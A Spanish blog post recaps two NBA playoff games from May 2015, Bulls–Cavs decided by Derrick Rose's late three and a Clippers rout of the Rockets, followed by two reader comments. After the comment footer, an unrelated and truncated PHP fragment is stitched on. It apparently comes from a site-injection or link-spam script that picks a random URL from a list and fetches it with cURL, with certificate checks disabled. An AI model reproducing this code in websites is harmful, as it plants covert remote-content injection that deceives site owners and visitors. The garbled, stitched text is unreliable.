La Crónica: La bomba Rose

09 de May de 2015 por TheDeerHunter

Se ponen 2 a 1 las dos series que se disputaron anoche. Un triplazo de Rose in extremis mandó a la lona a los Cavs, en uno de esos típicos partidos de playoffs que crean afición. En el Staples los Clippers no sufrieron tanto para anotarse el punto, aunque en esta ocasión los heroes no fueron los habituales, sino JJ Redick y, sobre todo, el hijísimo Austin Rivers.

Cavs 96 – Bulls 99

Un dificilísimo triple de Rose en la cara de Tristan Thompson terminó decantando la balanza a favor de los Bulls. El canastón de su vida tras el calvario que ha pasado. Justo pocos días después de que en el blog pusiéramos verde a la campaña que le dio el MVP.

Antes, los Cavs habían jugado bien sus cartas de la mano de LeBron que, con las 14 asistencias que repartió anoche, pasó de una tacada a Tony Parker, Steve Nash y Larry Bird como 4º máximo asistente en playoffs de la historia. Asumiendo su inferioridad física lo apostaron todo a la carta del tiro exterior y, a punto estuvo de salirles bien la jugada.

Los Bulls tuvieron que remar contra un pésimo comienzo de Rose, Butler y Noah y después con la lesión muscular de Pau, cuyo concurso es dudoso para el próximo partido como mínimo. Por fortuna para ellos Taj Gibson y Nikola Mirotic supieron suplirle bien y Rose&Butler supieron despertar a tiempo para enjugar la ventaja.
Los últimos minutos fueron un toma y daca de infarto, colofón a la tensión vivida toda la velada, en la que también asistimos a un nuevo capítulo de la rivalidad Noah vs LeBron. Éste ultimo se queja de “disrespectful words” y a mi me da la risa.

Con empate a 91 a 2′ para el final vimos, aliñados con algunos tiros libres, un canastón de Jimmy que después consolidaría en una ventaja de 3 puntos, el triple para empatar de JR Smith a 10” de la conclusión y el canastón de Rose en torno al cual gira toda la crónica.
¿Qué más se puede pedir?

Rockets 99 – Clippers 124

La magia de los playoffs también reside en actuaciones inesperadas de jugadores “corrientes” que cambian el curso de los acontecimientos y de la historia de la liga.

El palizón que se desprende del marcador no refleja del todo el global del partido de anoche. Ciertamente los Rockets fueron haciendo la goma ante un constante castigo de más de 30 puntos por cuarto, aunque también es cierto que parecían encajarlos bastante bien esperando su oportunidad. Gran primera parte de Dwight Howard y anotación muy repartida, con Harden destacando en labores de facilitador.

En su vuelta vimos a un Chris Paul renqueante, pero volvía a ser Griffin quien sostenía al conjunto mientras que JJ Redick tocaba la guitarra en el partido de su vida. Los Clippers anotaron demasiado fácil durante casi todas las fases del encuentro.

A pesar de todo, los Rockets dieron algunos zarpazos al final de la primera parte, con buzzer beater incluido de Harden que les colocaba “sólo” a 7 puntos. Me sangran los ojos por esos pasos.

En la reanudación McHale colocaba a Ariza sobre CP3 y aparecían dudas en los locales. En el comienzo del tercero los visitantes lograban empatar el choque y Rivers decidía sustituir al base allstar por su hijo. “I was probably his biggest cheerleader in the third quarter.” Diría Paul después… Rivers incendió/mató/desintegró el partido. Entrada tras entrada, canastón tras canastón, generó un desequilibrio que se tradujo en un parcial de 20-3. El choque estaba decidido antes del comienzo del último cuarto y confieso que yo me fui a dormir… los que se quedaron verían en acción a Turkoglu, Hudson, Udoh, Dahntay, Dorsey, Papanikolau, Capela…
Deberán espabilar mucho los Rockets defensivamente si quieren rascar algo del Staples.

Comenta

2 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Partidazo impresionante… igual que el Spurs-Clippers han sido partidazos al estilo Oeste, este lo fue al estilo Este… muy muy grande

      Citar

  2. Ruxixón dice:
    #2

    Irving tocado del tobillo….estamos de nones este año,2-1 por debajo en la serie.Lo bueno es que en un mal partido de los Cavs hemos estado ahí,como en el primero.Lo de Houston lo esperado,cuando tienen enfrente a un equipo serio les dan hondanadas.Harden nulo en defensa,y sin ser el líder en la cancha a estas alturas.Tocará segunda edición de “Egos heridos”

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>